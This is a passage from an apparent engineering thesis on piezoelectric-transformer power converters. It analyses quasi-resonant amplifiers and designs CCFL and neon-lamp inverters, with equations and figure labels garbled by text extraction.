1 V S 2nd _ 1 Vd2 PT VS1 SE-QR Amplifier Pout + VS1 _ RL 2 : 1 LVPT (LVPT-21) 0.3 H + Vd2 _ CF LM S1 LR Vin + VO _ Cd1 S1 LR Vin RIN = RACP = Pout V S RMS 1 2 ( ) PT Fig. 4. 14. SE-QR PT converter and its equivalent circuit. (a) block diagram of the power stage. (b) band-pass characteristics of the PT. (c) equivalent circuit. During the turn-off stage of S 1 , the input capacitance Cd1 provides a low impedance path compared to the mechanical branch of the PT. Accordingly, the major resonant component is Cd1 for the SE-QR inverter. The DC analysis of the equivalent circuit is done by a software program in MATLAB. 99 4.4.3 DC Analysis of SE-QR Amplifiers 4.4.3.1 SE-QR Amplifiers From the topological stages shown in Fig. 4.12 (b), the normalized steady-state capacitor voltage vcn and inductor current iln during toff are derived as: vcn t t e t e Io t e t t o t ( ) cos sin sin + 1 (4.19) i t e t Io t t q t e t e t o p t t ln( ) sin cos sin cos sin + + _ , _ , _ , 1 1 , (4.20) where 2 2 2 1 1 4 L C R C R IN IN IN , (4.21) 1 2 R C IN IN , and (4.22) o R IN L C 2 1 . (4.23) All the voltages and switching frequency are normalized as follows: vn v V IN , (4.24) in i V Z IN o , (4.25) F F F F n S S 2 , (4.26) q R Z P IN o . (4.27) Assuming that the ZVS operation needs to be maintained from load and line changes, then Fn is less than unity and is solved numerically by using MATLAB software program. Figure 4.15 illustrates the normalized vcn by using q p as running parameters for several Fn within a switching cycle. It can be observed that the smaller the Fn, the larger the voltage stress across the switch and the larger the circulating current appearing in the circuit. However, a large Fn indicates the negative portion of the resonant inductor current becomes less and the ZVS operation on S 1 is lost. Figure 4.16 reconstructs the previous figure with a 3D plot, and q p is the running parameter. vcn_1st is the normalized first order harmonic voltage of vcn with RMS value and it is particular 100 by important for the PT load. iln_max is the normalized peak-to-peak inductor current. The discontinuous region indicates that there is no ZVS operation for the switch. (a) (c) (b) 2 / 2 0 0 2 4 6 0 0 2 4 6 2 / 2 0 0 2 4 6 2 / 2 Fn = 0.8 qp qp = 2.55 Fn = 0.6 qp qp = 1.74 qp = 2.55 qp = 1.34 qp = 2.55 Fn = 0.4 qp vcn : normalized voltage waveform across S1 vcn vcn Fig. 4. 15. Normalized switch voltage waveforms of the SE-QR amplifier. (a) Fn = 0.8. (b) Fn = 0.6. (a) Fn = 0.4. These voltage waveforms are drawn with different Fn under the ZVS operation on the switch during a switching cycle. In (a), (b), or (c), the RMS values of vcn with different qp are almost identical. In other words, the RMS value of vcn is close to that when RIN or RACP approaches infinity. 101 0.3 0.5 0.7 0.9 0 1 2 3 qp=1.12 qp=1.56 qp=2.05 qp=2.5 qp=4.6 vcn_1st Fn = Fs / F (a) 0.3 0.5 0.7 0.9 0 20 40 qp=1.12 qp=1.56 qp=2.05 qp=2.5 qp=4.6 iln_max (c) 0.3 0.5 0.7 0.9 0 10 20 qp=1.12 qp=1.56 qp=2.05 qp=2.5 qp=4.6 vcn_max (b) Fn = Fs / F Fn = Fs / F Fig. 4. 16. Normalized switch voltage and current stress of the flyback SE-QR amplifier. (a) peak fundamental voltage of V S1 . (b) maximum voltage of V S1 . (c) peak-to-peak current of VS1. Fn is greater than 0.7 so that the normalized voltage stress is less than 4. qp is chosen to be greater than 2.05 to maintain the ZVS operation when the load changes. 102 4.4.3.2 Flyback SE-QR Amplifiers From Fig. 4.13 (b), the normalized capacitor voltage vcn and inductor current iln during turn- off interval are similar to those in (4.19) and (4.20). They are: vcn t t e t e Io t e t t o t ( ) cos sin sin + + 1 (4.28) i t e t Io t t t o ln( ) sin cos sin + + _ , _ , . (4.29) Although (4.28) and (4.29) are different from (4.19) and (4.20), their calculated steady-state current waveforms are almost identical. Using the same MATLAB program, the normalized voltage and current characteristics can be obtained and will not be repeated. 4.4.4 DC Characteristics and Experimental Verifications 4.4.4.1 DC Characteristics From Fig. 4.15 and 4.16, vcn_1st, vcn_max, and iln_max are functions of Fn only under the condition that q p is greater than 2.05. In other words, the voltage gain of the amplifier, for example vcn_1st, is a constant value when Fn is fixed and q p is no less than 2.05. By using this characteristic, the design of the SE-QR PT converter is achieved without considering the load effect in the beginning. The flow chart used to calculate the current and voltage waveforms of the equivalent circuit for the SE-QR PT converter is listed in Fig. 4.17. Figure 4.18 illustrates the voltage gain and maximum voltage stress of the SE-QR PT converter with LVPT-21. In Fig. 4.18, Fn is the running parameter and the DC characteristics are calculated for different values of R L at Fs = 1.92 and 1.96 MHz. The broken lines indicate where the ZVS operation on S 1 is lost. 4.4.4.2 Experimental Verifications Figure 4. 19 (a) shows the experimental SE-QR LVPT converter, and its equivalent circuit is shown in 4.14 (c) at Fs = 1.96 MHz. The measured and experimental waveforms for voltage gain are shown in Fig. 4.19 (b), and they are similar in shape and value. The ZVS operation is maintained only when R L is less than 20 shown in Fig. 4.19 (c). When R L increases, q p decreases and Fn increases. Those factors are counterproductive to achieving the ZVS operation because the inductor current i LR only flows in the positive direction shown in the right upper corner of Fig. 4.19 (c). The voltage waveforms of V S1 for different load conditions have been measured from the experimental circuit, simulated by SIMPLIS software program, and also simulated by the developed software program in MATLAB. These three sets of waveforms are shown in Fig. 4.20. The waveforms with circular marks are measured or simulated under R L = 10 and Fs = 1.96 MHz. They are similar in shape and their peak voltage stresses are close to 35 V. 103 Fn = Fn_ini, Rload = Rload_ini, CIN = Cd1 Input s, Lm, Fn_ini, Rload_ini, and PT's parameters START Calculate vcn_1st & Vs1(RMS) from waveperf ( Fn, 0 ) Calculate vcn and icn from waveperf ( Fn, ) Calculate Fn 2 RIN CIN s Calculate ZL= Rload + j s Lm RIN Pout Vs1(RMS) 2 , Pout Rload Vd2 2 Calculate Calculate Vd2 = PT's voltage gain ( Fs, ZL ) vcn_1st Find gain of the PT converter and max. voltage of vcn Fn = Fn + 0.1 Rload = Rload + 5 END Rload < 80 YES NO Fn < 0.9 YES NO Fig. 4.17. Flow chart used to calculate the normalized voltage and current waveforms of the SE- QR amplifier. The subroutine waveperf (Fn, ) is employed to calculate the normalized vcn and iln when the Fn and are specified. This program is coded in MATLAB. 104 0 20 40 60 80 0.5 1 1.5 2 2.5 3 0 20 40 60 80 3 3.5 4 4.5 5 5.5 0 20 40 60 80 0 20 40 60 80 3 3.5 4 4.5 5 5.5 Fs=1.96 MHz RL () Voltage gain : Vo/Vin Voltage gain : Vo/Vin Normalized maximum voltage on S1 0.5 1 1.5 Fs=1.92 MHz Normalized maximum voltage on S1 RL () RL () RL () Fn = 0.5 Fn = 0.6 Fn = 0.7 Fn = 0.5 Fn = 0.6 Fn = 0.7 Fn = 0.5 Fn = 0.6 Fn = 0.7 Fn = 0.5 Fn = 0.7 0.6 Fs=1.96 MHz Fs=1.92 MHz (a) (b) Fig. 4.18. Voltage gain and maximum voltage stress of the SE-QR LVPT converter. (a) voltage gain. (b) maximum voltage on S1. The power stage of the converter is shown in Fig. 4.14 (a). The broken lines indicate where the ZVS operation is lost. Voltage gain is normalized to input voltage and is greater than 0.5. This means that the gain of the SE-QR amplifier is greater than unity and it is not suitable for step-down applications. 105 (a) 10 V S1 + VS1 _ RACP 1.6 H 2.6nF Cd1 IRF 640 LR 10 20 30 40 50 20 40 60 80 1 2 3 RACP ( ) qp qp RACP ZVS operation RL () (b) (Times 100 nS) 0 1 2 3 4 5 0 20 40 0 1 2 3 4 5 0 1 2 RL= 12 RL = 12 RL= 5 VS1 ILR Fs = 1.96 MHz (c) 4 5 6 1.9 1.92 1.94 1.96 1.98 2 Fs : (MHz) Vo : output voltage of the PT converter calculated measured Fig. 4. 19. Experimental verification of the SE-QR LVPT converter. (a) simplified equivalent circuit. (b) RACP of LVPT-21. (c) calculated and measured voltage gain. Comparing RACP in (c) with RIN in Fig. 4.2 (b), they are totally different. To maximize the efficiency of LVPT-21, the operating frequency is set to 1.96 MHz determined by the power flow method. 106 VS1 RL = 30 0 0 0 0 VS1 RL = 10 VS1 RL = 50 VGS1 (a) 10 30 10 30 10 30 VS1 RL = 30 VS1 RL = 10 VS1 RL = 50 (b) 10 30 (c) VS1 RL = 10 Fig. 4. 20. Experimental waveforms of the SE-QR LVPT converter with different values of RL. (a) experimental results. (b) simulation results obtained from SIMPLIS. (c) simulation results employed analytical expression of vcn and the host simulation program is MATLAB. 107 4.4.5 Design Guidelines To operate the PT efficiently, the optimal load and operating frequencies of the PT are predetermined as mentioned in section 3.2.3. From the DC characteristics of the SE-QR LVPT converters shown in Fig. 4.18, the major design parameter is Fn which is defined in (4.26). To maintain the ZVS operation and to minimize the voltage and current stresses on S 1 when R L changes, Fn is chosen to be 0.7. It is always desirable to choose the minimum capacitance of C IN to minimize the current and voltage stress. Therefore, C IN is equal to input capacitance of the LVPT-21, Cd1, in Fig. 4.14.(c). Since C IN , Fs, and Fn are known for the constant-frequency- controlled SE-QR LVPT converter, L R can be calculated by substituting (4.26) to (4.21) and is L C F R C R IN S n IN IN _ , 1 1 4 2 2 2 2 . (4.30) For example, L R = 1.4 H when Fs = 1.96 MHz, Fn = 0.7, R IN = R ACP = 62 and C IN = Cd1 = 2200 pF. Another important simulation result observed from the DC characteristics of the amplifier is the fact that the voltage gain of the amplifier is always greater than unity. Therefore, it is preferable to adopt this topology in step-up applications. 4.4.6 Conclusions The equivalent circuit of the SE-QR PT converters is verified with LVPT converters, and it has been confirmed that the calculated results are similar to the experimental results. Because of the step-up characteristics of the voltage gain, this amplifier is not suitable for step-down or LVPT applications. Thus, the design example will be concentrated on step-up or high-voltage applications, and this will be discussed in Chapter 5. However, an SE-QR PT converter with LVPT-21 is built and tested for the purpose of evaluating three amplifier circuits in LVPT applications. 4.5 Performance Comparison of LVPT Converters Figure 4.21 summarizes the efficiency of the three converters under different loads at a fixed switching frequency of 1.96 MHz, where the efficiency of LVPT-21 is maximized under the optimal load. These three LVPT converters are the half-bridge converter shown in Fig. 4.6 (a) with V IN = 48 Vdc, the SE-MR converter shown in Fig. 4.11 (a) with V IN = 48 Vdc, and the SE- QR LVPT converter shown in Fig. 4.19 (a) with V IN = 20 Vdc. It can be seen that the best efficiency occurs around R L = 9.6 , which is equal to the calculated optimal value in Chapter 3. Table 4.2. shows the component counts and the performance indices for the three converters. The advantages of the SE-MR PT converter include simple structure, fewer components, and utilization of circuit parasitics. Also, the control method is variable-frequency, which can be modified to track the optimal operating frequency which varies with load and temperature. The advantages of the half-bridge PT converter are greater efficiency and less generated noise than the 108 SE-MR PT converters. But two inductors are required to act as buffers for the transition from square wave to sinusoidal wave or vice versa. They both are suitable to step-down applications employing LVPT. The SE-QR amplifier is the simplest circuit among three amplifier topologies, and it is ideal for high-voltage applications. 10 15 20 25 0.76 0.78 0.8 0.82 RL () Half-Bridge converter, VIN = 48 Vdc Fs = 1.96 MHz, Vo = 12 Vdc SE-MR converter, VIN = 48 Vdc SE-QR converter, VIN = 20 Vdc Fig. 4.21. Efficiency comparison of three LVPT converters. 109 Table 4.2. Comparison of three LVPT converters employing the half-bridge, SE-MR, and SE- QR amplifier topologies. Topologies HB 2:1 LVPT dc/dc Con. SE-MR 2:1 LVPT dc/dc Con. SE-QR 2:1 LVPT dc/dc Con. no. of inductors 3 2 no. of capacitors 2 2 1 no. of switches 2 1 1 input voltage 48 Vdc 48 Vdc 20 Vdc @ output = 12 V, 14.4 Watts 83.6 % 81 % 79.3 % switching Freq. 1.96 MHz 1.96 MHz 1.96 MHz no. of high-side drivers 1 0 0 voltage gain of the converter < 1 < 1 > 1 Items 3 110 4.6 Summary The design guidelines are given for these three amplifiers according to the DC analysis from carried out while employing the respective lumped equivalent circuits. Comparative studies on efficiency, cost, and complexity for different amplifier topologies have been performed. Although the performance comparison is made on LVPT applications, it is also applied to the applications using HVPTs. Because the current applications suitable for HVPTs are usually lower than 10 watts and require very tight packaging, cost, simplicity, and efficiency of the circuit are all major concerns. Among those three types of amplifiers, it seems that only the SE-QR amplifier can meet those requirements by sacrificing the efficiency factor slightly. The dc/ac voltage gain of the half-bridge and SE-MR amplifiers can be feasibly below unity. It suggests that these two amplifiers are useful for step down applications, like on-board power supplies or AC adapters. On the other hand, the dc/ac voltage gain of the SE-QR amplifier is naturally larger than unity. Besides, it consists of only one switch and a resonant inductor, and so it is the most cost-effective circuit and suitable for step-up applications. Therefore, this type of amplifier topologies is chosen for the application circuits in the next chapter, entitled High- Voltage Applications for Piezoelectric Transformers. 111 5. High-Voltage Applications of Piezoelectric Transformers 5.1 Introduction Different kinds of applications for high-voltage piezoelectric transformers (HVPTs) can be found in several publications [1,14,15,18,48,49]. HVPTs have been adopted by power electronic engineers and researchers worldwide. However, design issues such as packaging, thermal effects, amplifier circuits, control methods, and matching [21] between amplifiers and loads need to be explored further. This chapter contains an extensive discussion of the last three design issues. Packaging and thermal effects of PTs are still under research. The HVPTs are definitely better high-voltage sources for devices which need low-power high-voltage sources, such as cold-cathode fluorescent lamps (CCFLs), neon lamps, and miniature cathode-ray tubes (CRTs). The HVPTs low profile and low cost make it especially attractive for backlighting the LCD in a notebook computer. The CCFL HVPT inverters are divided into two groups, depending on the applied control methods. Two sets of comparison studies are established, and the constant-frequency-controlled HVPT CCFL inverter is used as the basis. The first set of inverters includes the constant-frequency-controlled and the conventional inverters; meanwhile, the comparison is made according to the specifications of the conventional CCFL inverter provided by Delta Electronics Inc. The second set of inverters includes both constant- and variable-frequency-controlled inverters. Similarly, the comparison is achieved according to the specifications of the variable-frequency-controlled HVPT CCFL inverter from Tokin Corp. The flyback single-ended quasi-resonant (SE-QR) amplifier was adopted to incorporate the input capacitance of the PT into the amplifier design. Because the step-up ratio for a Rosen-type HVPT with a CCFL load is too low, and the output voltage of the HVPT is low for the input source from a battery, it is necessary to modify the resonant inductor in the SE-QR amplifier to a step-up transformer. Accordingly, a large capacitance is presented on the primary side of the amplifier due to the reflected input capacitance of the PT on the secondary side. This large reflected capacitance needs to be considered in the amplifier design. In this amplifier, the circulating current is moved to the secondary side of the transformer, and there is no current flowing in the primary circuit when the main switch is turned off. By adding an extra switch to 112 regulate the output current of the lamps, dimming control and line regulation are achieved through constant-frequency control. A complete inverter with HVPT for CCFL or neon lamps was built, and the experimental results are presented. Choosing a suitable HVPT for a CCFL is very important for matching the source and the load. The output impedance for a general CCFL is around 100 k, but the matched output impedance for a typical HVPT is above 200 k. A multilayer (stacked) structure HVPT was proposed in [48] and could be built according to the load requirements. The multilayer HVPT makes it possible to achieve matching between load and output of HVPT and also increases the step-up ratio under heavy load conditions. A large input capacitance was found due to the stacked structure and needs to be incorporated into the amplifier design. A commercial prototype variable-frequency-controlled CCFL inverter with HVPT was investigated. The major interest of the comparison focuses on the control methods and their corresponding performances. 5.2 Characteristics of the HVPT The purpose of this section is to present the characteristics of the HVPTs and to demonstrate the usefulness of the model of the HVPT in circuit simulation. The general characteristics of the experimental HVPT, which is HVPT-02, are listed below: Type : Rosen type (single layer, no isolation), Power handling : 3 - 6 Watts, Series resonant frequency : about 73 kHz (no load) , and Size : ( ) 50 8 15 . L W T all in mm . Figure 5.1. shows the equivalent circuit and voltage gain of HVPT-02. The parameters of the equivalent circuit can be obtained by measurements [5,8] described in Chapter 2, or by direct calculation [3-5] employing the physical size and material properties of the HVPTs. To maximize the efficiency of the HVPT, it is essential to decide its full load and corresponding operating frequency. The simulation results in [17] show that the maximal efficiency of the HVPT with a resistive load occurs when HVPT voltage gain reaches maximum at a specified operating frequency. Voltage gain of the HVPT is defined as Voltage gain V rms V rms o IN ( ) ( ) (5.1) Figure 5.1 (b) shows the frequency vs. voltage-gain curves calculated for several load resistances. It is important to notice that for each load resistance, the maximal voltage gain matches a designated operating frequency. Figure 5.1 (c) illustrates that the optimal resistive load of HVPT-2 is 330 k, which is the impedance of the output capacitance around fs. Besides, the efficiency of the PT decreases when the switching frequency increases. Because of the increased dielectric loss, this phenomenon will become more prominent while the output power increases. 113 200 k 280 k 475 k 68 kHz 72 kHz 76 kHz 4 8 12 Rload = 600 k Rload = 98.2 k (b) (c) + Vo _ 7.33 pF 811 pF 68.5 0.149 H 37.7 pF 1 : 5.16 Cd2 Cd1 Vin Rload 100 k 300 k 500 k 0.92 0.96 1 s Cd2 330 k 67.5 kHz 70 kHz 72.5 kHz 75 kHz Rload (a) Pin Po Vin Vo Fig. 5.1. Theoretical voltage gain and efficiency of HVPT-2. (a) model of HVPT-2. (b) gain characteristics of the HVPT-2. (c) calculated efficiency of HVPT-2 employing the PT model shown in (a) under different resistive loads. The maximum gain for each resistive load is different and occurs at different frequency, fo. As long as the switching frequency stays close to fs, the efficiency of the HVPT does not change much with different loads. 114 To control the power processed by the PTs is actually to control the voltage gain of the PT. The methods for controlling the PTs could be either constant-frequency control or variable- frequency control. The voltage gain of the PTs increases when the load resistance increases. This characteristic will help to ignite the high-pressure lamps such as CCFLs and neon lamps. For constant-frequency control, the voltage gain cannot track the peak of the curves, and the advantage of using PTs is lost. Figure 5.2 further illustrates the trajectories for constant- frequency and variable-frequency controls during start-up of the CCFL. 68 kHz 72 kHz 200 k 280 k 475 k Voltage Gain = Vin Vo 76 kHz 4 8 12 Rload = 98.2 k C A' A B Rload = start-up resistance of the Fig. 5.2. Gain characteristics and control methods of HVPT-2. For constant-frequency control, the trajectory for starting up the lamp is from A to B. On the other hand, the variable- frequency control follows the curve C A' to B. The voltage gains at A and A are identical, and the lamp ignites at this voltage. At B, the lamp is operating under the nominal condition and behaves like a resistor. 115 For constant-frequency control, the maximum gain at a particular frequency is fixed. Once the lamp is ignited, the operating point moves from A to B, and the nominal operating condition is set at point B. On the other hand, the operating frequency is swept from high frequency (point C) to point A, where the lamp ignites and operation point will move to point B later. Therefore, the highest voltage gain is fully explored for variable-frequency control, and start-up of the lamp is achieved easily. However, the lamp might fail to ignite if the operating frequency weres not chosen carefully. From section 2.4.1, the efficiency of the PT decreases when the operating frequency increases. The lower the load resistance, the lower the efficiency. The last two effects result from the increased dielectric loss when the reactive power increases. Therefore, the efficiency of the PT can not be maximized when variable-frequency control is used. The pros and cons for these two control methods will be discussed further in the examples. 5.3 Characteristics of the CCFL and Neon Lamps The lamps used in this report are CCFLs and neon lamps. Dynamically, these two lamps work like negative resistors. Therefore, a ballast is required to be added to each of these lamps to limit the negative current. While in steady state, these lamps show the characteristics similar to resistors [49]. 5.3.1 Characteristics of the CCFL The specifications for the experimental CCFL are listed below: Model No.: FC2EX50 / 250T4, Strike voltage: 1050 Vrms @ 0 o C, Maintaining voltage : 490 Vrms, Nominal lamp current: 5 mArms, and Physical size : 20 cm long and 5mm in radius. Basically, there are four parameters important in lighting up the CCFL: strike voltage, maintaining voltage, frequency, and lamp current [50]. The brightness does not change much with the operating frequency of the lamp and is mostly determined by the lamp current. Under a specified lamp current, when the output voltage of the inverter reaches the maintaining voltage, the impedance of the CCFL is resistive and changes with the lamp current. The impedance vs. lamp current curve of CCFL is shown in Fig. 5.3 (a). This curve illustrates that the CCFL behaves like a resistor in steady state, but dynamically the CCFL shows the negative resistance characteristic. Therefore, a ballast is required between a CCFL inverter and its lamp. Nevertheless, the HVPT is a perfect source for the CCFL because it generates a very high strike voltage at light load and behaves like a ballast for its positive impedance characteristics. 116 5.3.2 Characteristics of Neon Lamps Similarly, the neon lamps, which need very high strike voltage to ignite and are very high- impedance components, could be the desirable loads for the HVPTs. Standard B2A high- brightness lamps have the following specifications: Strike voltage: 90 Vrms, Maintaining voltage : 70 Vrms, and Nominal lamp current: 1 mArms. (a) 4 4.5 5 5.5 6 190 k 210 k 230 k Impedance of the combined neon lamps (b) Lamp current of neon lamps (mA) Lamp current of CCFL (mA) 3 4 5 6 7 Impedance of the CCFL 200 k 160 k 120 k 80 k 105 k 209 k Fig. 5.3. Characteristics of the experimental CCFL and neon lamps. (a) CCFL. (b) neon lamps. Dynamically, the V-I curve for CCFL indicates the nature of the negative resistance of CCFL. Nevertheless, the lamp voltage and lamp current are in phase, and this indicates they are resistors at certain operating points. 117 (a) (b) Rload - VS1 + HVPT-02 1 : NR LR 810 pF Cd1 Lamp Cd1 = CIN RACP = 1 : NR LR Io VO ILR VIN RIN Fig. 5.4. Experimental flyback SE-QR CCFL inverter and its DC characteristics. (a) power stage. (b) equivalent circuit. The four factors necessary to light up the CCFL are also applicable to neon lamps. Employing the same test setup, the lamp current-impedance characteristic is shown in Fig 5.3 (b). These data verify that the neon lamp acts like a resistive load in steady state [49]. In order to obtain the optimal impedance for the HVPT, fifteen B2A lamps are connected in series, and two of them are arranged in parallel to achieve the desirable impedance for HVPT-02. 5.4 Design Examples of Flyback SE-QR HVPT Inverters 5.4.1 Flyback SE-QR HVPT Inverters Block diagram of the flyback SE-QR inverter is shown in Fig. 5.4 (a), and its equivalent circuit developed in the previous chapter is illustrated in Fig. 5.4 (b). The operating principles of this inverter were described in Fig. 4.13. In Fig. 5.4 (b), R IN = R ACP and C IN = Cd1, where R IN and C IN are the load of the flyback SE-QR amplifier shown in Fig. 4.13 (a). The lamps used as the 118 load of HVPT-02 are CCFLs and neon lamps. The analytical forms for the voltage across Cd1 and inductor current I LR had been derived in (4.28) and (4.29). Using the flow-chart shown in Fig. 4.17, the DC characteristics of the flyback SE-QR HVPT inverter can be obtained and employed to design the inverters. 5.4.2 DC Characteristics Figures 5.5 and 5.6 shows the DC characteristics of the flyback SE-QR inverter when Rload = 105 k and 209 k, respectively. Under the normal operating condition, the lamp current = 5 mA, the load resistance of the CCFL is 105 k, and that of the neon lamps is 209 k. R ACP vs. switching frequency curve is shown in Fig. 5.5 (a). The maximum voltage stress on S 1 is shown in Fig. 5.5 (b), where the voltage is a function of Fn only as predicted in the last chapter. Figure 5.5 (c) shows the normalized voltage-gain curves with Fn as the running parameter and N R = 1. Here, q p is decoupled from the voltage-gain design, because the first-order harmonic contents shown in Fig. 4.14 (a) do not change much when q p is greater than 2.05 with a fixed Fn. 5.4.3 Design of the Power Stage The design example is a CCFL inverter employing HVPT-02. The specifications of the experimental CCFL inverter are: input voltage : 9 - 16 volts, maximum lamp current : 5 mA (rms). The design issue is to find the inductance L R and the turns ratio of the transformer so that the desirable output voltage can be obtained under low-line and heavy-load conditions. To maintain a constant output voltage across Rload, either constant- or variable- frequency control may be adopted for different line and load conditions. The following example is designed for constant- frequency controlled inverters. From Fig. 5.3 (a), Rload = 105 k and Vo (RMS) = 525 volts when Io = 5 mA. Figure 5.5 (c) shows the major design curve representing the voltage-conversion ratio between Vo (RMS) and the input voltage with N R =1. From the specifications, the necessary voltage gain M from V IN = 9 volts is M Vo V RMS IN ( ) . 525 9 583 (5.2) From the maximum voltage stress shown in Figs. 5.5 (b) and 5.6 (b), Fn is chosen to be greater than 0.7. To maximize both efficiency and voltage gain of HVPT-02, the operating frequencies of the inverter are 68.2 and 68.7 kHz, for Rload = 100 k and 200 k, respectively. Therefore, the normalized voltage-gain conversion ratio is equal to 6.3 obtained from Fig. 5.5 (c) when Fn = 0.7, Fs = 68.2 kHz, and Rload =105 k. The turns ratio of the transformer is calculated as 119 2 3 4 5 6 7 Normalized voltage gain of the converter 66 68 70 72 74 (kHz) Switching frequency (Fs) Fn 0.5 0.6 0.7 0.8 Fn = 0.5 0.6 0.7 0.8 CCFL lamp current = 5 mA Rload = 105 k 66 68 70 72 74 Fs ( kHz ) 0 (a) RIN (k) 100 80 60 40 20 Fn 0.5 0.6 0.7 0.8 Rload = 105 k 3 4 5 66 68 70 72 74 Fs ( kHz ) Fn 0.5 0.6 0.7 0.8 Normalized maximum voltage on S1 (b) (c) Vin Vo(RMS) Fig. 5.5. DC characteristics of flyback SE-QR HVPT inverters when Rload = 105 k. (a) calculated RACP (b) normalized maximum voltage. (c) normalized voltage gain. For example, the voltage gain is equal to 6.3 when Fs = 68.2 kHz, Fn = 0.7, and NR = 1. RACP is calculated according to the power balance in the equivalent circuit. These curves are calculated when Rload = 105 k = the impedance of the CCFL with 5-mA lamp current. 120 (Normalized voltage gain of the converter) 66 68 70 72 74 Fs ( kHz ) 0 RIN (k) 50 40 30 20 10 Fn 0.5 0.6 0.7 0.8 Rload = 209 k 3 4 5 66 68 70 72 74 Fs ( kHz ) Fn 0.5 0.6 0.7 0.8 Normalized maximum voltage on S 1 2 3 4 5 6 7 8 66 68 70 72 Fn 0.5 0.6 0.7 0.8 Fn = 0.5 0.6 0.7 0.8 74 (kHz) Switching frequency (Fs) (a) (b) (c) Neon lamp current = 5 mA Rload = 209 k Vin Vo(RMS) Fig. 5.6. DC characteristics of flyback SE-QR HVPT inverters when Rload = 209 k. (a) calculated RACP (b) normalized maximum voltage. (c) normalized voltage gain. These curves are calculated when Rload = 209 k = the impedance of the neon lamps with 5-mA lamp current. 121 N R 583 63 9 26 . . . (5.3) N R is chosen as 9.5. In Fig. 5.5 (a), R ACP is equal to 4900. R IN is the reflected resistance of R ACP from the secondary side and R IN = 54.3 . The resultant capacitance of the reflected Cd1 and the winding capacitor C W is N Cd C pF nF nF R W 2 2 1 9 25 810 1 703 + + ( . ) . . (5.4) With C IN = 70.3 nF and Fs = 68.2 kHz, L R is found: L C Fn Fs n H R IN _ , _ , 1 2 1 703 07 2 68200 38 2 2 . . . (5.5) 5.4.4 Experimental Results In this section, a flyback SE-QR inverter is built and CCFL and neon lamps are connected to the same inverter designed for the CCFL inverter. The purpose of this arrangement is to verify the influence of the inverters on different loading conditions. The output impedances of the experimental CCFL and neon lamps are 100 k and 200 k, respectively, when both lamp currents are 5 mA (rms). So the switching frequency of the experimental circuit needs to be changed with the different lamps to maximize the gain of the inverter. Figure 5.7 (a) shows the experimental flyback SE-QR converter whose parameters are calculated in section 5.4.1. The comparison between experimental and theoretical results is illustrated in Fig. 5.7 (b), and the results are close to each other. 5.4.4.1 CCFL Inverters The load resistance of the CCFL equals 100 k. The experimental waveforms for the CCFL inverter are shown in Fig. 5.8 (a). 5.4.4.2 Neon-Lamp Inverters The load resistance of the neon lamp is 200 k. The experimental waveforms for the neon- lamp inverter are shown in Fig. 5.8 (b). From Fig. 5.8, the output current and voltage waveforms are not quite sinusoidal, but they are almost in phase. In order to verify the efficiency of the inverter with different loads, two power resistors are used to replace the CCFL and neon lamps. The measurement results for the inverter with different loads are summarized in Fig. 5.8 (c). For lower load impedance, like that of the CCFL, the operating frequency is lower than that of a neon-lamp inverter. However, the efficiency of the inverter with different loads is almost identical. These facts verify the characteristics of this HVPT with different loads. 122 (a) (b) calculated results 66 68 70 72 74 (kHz) 0 200 400 600 800 measured results VO( RMS) Switching frequency ( Fs ) Rload 500 k 400 300 200 100 1:9.5 9 V LR = 40 uH Rload HVPT-02 IRF 520 VO Fig. 5.7. Experimental flyback SE-QR HVPT inverter and its experimental verifications. (a) flyback SE-QR HVPT inverter. (b) voltage gain vs. frequency. 123 0 0 0 VS1 50 V/div. ILR 0.5 A/div. IO 10 mA/div. VO 500 V/div. VO IO (a) (b) (c) 0 0 0 VS1 20 V/div. ILR 1 A/div. IO 10 mA/div. VO 500 V/div. VO IO Rload FS (kHz) VIN (V) IIN (mA) IO(rms) (%) 100 k 68.2 8.7 0.35 5 200 k 68.7 11.5 0.54 5 80 81 Fig. 5.8. Experimental waveforms of flyback SE-MR HVPT inverters. (a) CCFL. (b) neon lamps. (c) comparisons of efficiency. The VO and IO are almost in phase for both lamps. This verifies that these lamps are resistors under nominal operating points. All notations are referred to Fig. 5.4 (a). 124 5.5 Buck + Flyback SE-QR HVPT Inverters (The Reference Circuits) The performance of this inverter is compared with that of a commercial product from Delta Electronics Inc. in section 5.6. Its performance is also compared with that of a prototype HVPT CCFL inverter from Tokin Corp. in section 5.7. 5.5.1 Operation Principles In order to maintain the same output current delivered to the load in spite of line variations, two control methods can be applied to this inverter. One is the variable-frequency control or fixed-off time control; however, the efficiency of the PTs decreases when the switching frequency is changed under fixed load. The other method is the PWM control, but an additional switch is added. The power stage and theoretical waveforms of the complete amplifier are shown in Fig. 5.9. The idea is to turn off S 2 before turning off S 1 so that the primary current is maintained at the same value at t0, and the output current can be regulated. The shaded area shows that the current circulating through S 1 and D 1 results in extra conduction loss in the switches. The operation principle of the complete inverter is described below. During time interval [t0,t1], its operation principle is identical to that of the flyback SE-QR inverter. Both S 1 and S 2 can achieve the ZVS operation. At t 2 , S 2 is turned off, and voltage across L R is not clamped by V IN or D 1 any more. In the meantime, the reflected capacitance of CIN in the primary side is much larger than the output capacitance of S 2 . As a result, the current flows in the secondary side entirely, and V S2 is shaped by the input capacitor of the PT and L R . At t 3 , D 1 conducts, and the primary current, I LP , is circulating through D 1 and S 1 . At t 0 , S 1 is turned off and another cycle of the operation repeats. 5.5.2 Design of Power Stage The power stage and its control circuit of a complete CCFL inverter with the HVPT are shown in Fig. 5.10. The power stage consists of a buck converter and a flyback SE-QR inverter which was designed in section 5.4. The control chip of the inverter is UC 3871, which is a fluorescent lamp driver from Unitrode and constant-frequency control is adopted. Instead of using another extra switch to perform the buck operation, it is possible to use variable-frequency control for the flyback SE-QR inverter. However, the efficiency of this variable-frequency- controlled inverter is less than that of the basis circuit by 4 % under high-line operation, where the switching frequency is away from the series resonance frequency fs of the HVPT. The final breadboard CCFL inverters can deliver up to 6 watts, and the range of line regulation is from 8 Vdc to 16 Vdc. Its physical size is ( ) 127 165 55 . . L W T all in mm . In order to demonstrate the uniformity of both HVPTs and their usefulness for inverter applications, four HVPT CCFL inverters have been built and tested under a 2.5-watt output power. Figure 5.11. illustrates the efficiencies of the four experimental inverters from 8 Vdc to 16 Vdc. The measured efficiencies of all HVPT inverters agree with one another. 125 V IN VS1 VS2 ILR ILS VGS2 VGS1 t 1 t 2 t 3 0 t (a) (b) ILR 1:N VIN LR - VS1 + CIN ILS + VS2 - D1 Rload Fig. 5. 9. Buck + flyback single-ended quasi-resonant (SE-QR) amplifiers. (a) power stage. (b) theoretical waveforms. 126 (a) the reference circuit IRFD 120 IRFD 9020 IFB HVPT-2 35 H + VO _ IO Rload LR + VS2 - D1 S2 - VS1 